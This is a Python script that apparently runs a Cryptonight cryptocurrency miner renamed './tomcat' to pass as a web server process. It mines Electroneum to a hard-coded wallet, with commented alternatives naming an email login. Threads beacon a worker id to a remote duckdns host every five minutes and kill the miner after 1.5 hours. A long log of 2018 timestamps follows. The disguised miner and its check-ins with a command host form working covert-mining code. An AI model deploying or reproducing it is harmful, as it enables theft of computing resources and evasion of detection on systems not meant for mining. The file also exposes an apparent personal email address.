import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:39:04.149281
#2018-02-17 16:24:06.564777
#2018-02-17 18:12:05.116948
#2018-02-17 19:59:07.273947
#2018-02-17 21:47:07.017036
#2018-02-17 23:32:05.112133
#2018-02-18 01:21:07.256959
#2018-02-18 03:08:04.204898
#2018-02-18 04:55:01.620931
#2018-02-18 06:46:01.506561
#2018-02-18 08:34:06.492560
#2018-02-18 10:21:01.809627
#2018-02-18 12:07:02.091280
#2018-02-18 13:51:07.369522
#2018-02-18 15:43:03.634617
#2018-02-18 17:33:03.485442
#2018-02-18 19:21:05.753943
#2018-02-18 21:07:01.829944
#2018-02-18 22:53:07.236459
#2018-02-19 00:42:03.654536
#2018-02-19 02:28:01.516929
#2018-02-19 04:15:05.994333
#2018-02-19 06:01:07.208171
#2018-02-19 07:50:07.032263
#2018-02-19 09:40:07.159879
#2018-02-19 11:29:01.593936
#2018-02-19 13:17:04.354668
#2018-02-19 15:04:06.035844
#2018-02-19 16:52:03.951973
#2018-02-19 18:40:09.735846
#2018-02-19 20:26:04.661959
#2018-02-19 22:13:07.390984
#2018-02-19 23:59:01.812707
#2018-02-20 01:46:04.184650
#2018-02-20 03:34:08.133254
#2018-02-20 05:21:05.738375
#2018-02-20 07:05:08.096439
#2018-02-20 08:51:05.924182
#2018-02-20 10:35:07.490922
#2018-02-20 12:21:08.782020
#2018-02-20 14:08:05.259945
#2018-02-20 15:53:09.121029
#2018-02-20 17:40:07.760449
#2018-02-20 19:28:05.394607
#2018-02-20 21:16:01.579995
#2018-02-20 23:00:10.435216
#2018-02-21 00:45:08.113818
#2018-02-21 02:31:07.840408
#2018-02-21 04:21:01.872294
#2018-02-21 06:07:06.756816
#2018-02-21 07:54:03.521386
#2018-02-21 09:39:05.305793
#2018-02-21 11:27:08.028366
#2018-02-21 13:15:08.551999
#2018-02-21 15:01:01.237145
#2018-02-21 16:49:11.622306
#2018-02-21 18:38:04.260914
#2018-02-21 20:23:05.201052
#2018-02-21 22:12:06.559361
#2018-02-22 00:01:06.559562
#2018-02-22 01:49:06.755968
#2018-02-22 03:37:04.132131
#2018-02-22 05:24:05.805549
#2018-02-22 07:09:07.287727
#2018-02-22 08:55:09.860647
#2018-02-22 10:43:08.779637
#2018-02-22 12:29:05.608081
#2018-02-22 14:15:02.088961
#2018-02-22 16:02:08.847487
#2018-02-22 17:49:13.139929
#2018-02-22 19:37:02.118555
#2018-02-22 21:30:07.362188
#2018-02-22 23:17:01.332527
#2018-02-23 01:04:06.903290
#2018-02-23 02:52:05.540815
#2018-02-23 04:39:07.762933
#2018-02-23 06:25:03.795684
#2018-02-23 08:12:04.901088
#2018-02-23 10:26:01.701097
#2018-02-23 12:19:05.163503
#2018-02-23 14:07:03.546226
#2018-02-23 15:57:05.813669
#2018-02-23 17:42:07.374800
#2018-02-23 19:29:08.185980
#2018-02-23 21:12:08.038080
#2018-02-23 22:59:06.919337
#2018-02-24 00:46:07.269696
#2018-02-24 02:41:02.170088
#2018-02-24 04:35:04.430203
#2018-02-24 06:19:04.891084
#2018-02-24 08:07:05.126928
#2018-02-24 09:51:05.531656
#2018-02-24 11:45:08.947181
#2018-02-24 13:37:08.018247
#2018-02-24 15:25:09.120237
#2018-02-24 17:15:04.563942
#2018-02-24 19:07:03.735911
#2018-02-24 20:55:06.078078
#2018-02-24 23:21:06.832417
#2018-02-25 02:46:05.194860
#2018-02-25 06:22:05.921890
#2018-02-25 11:39:04.195806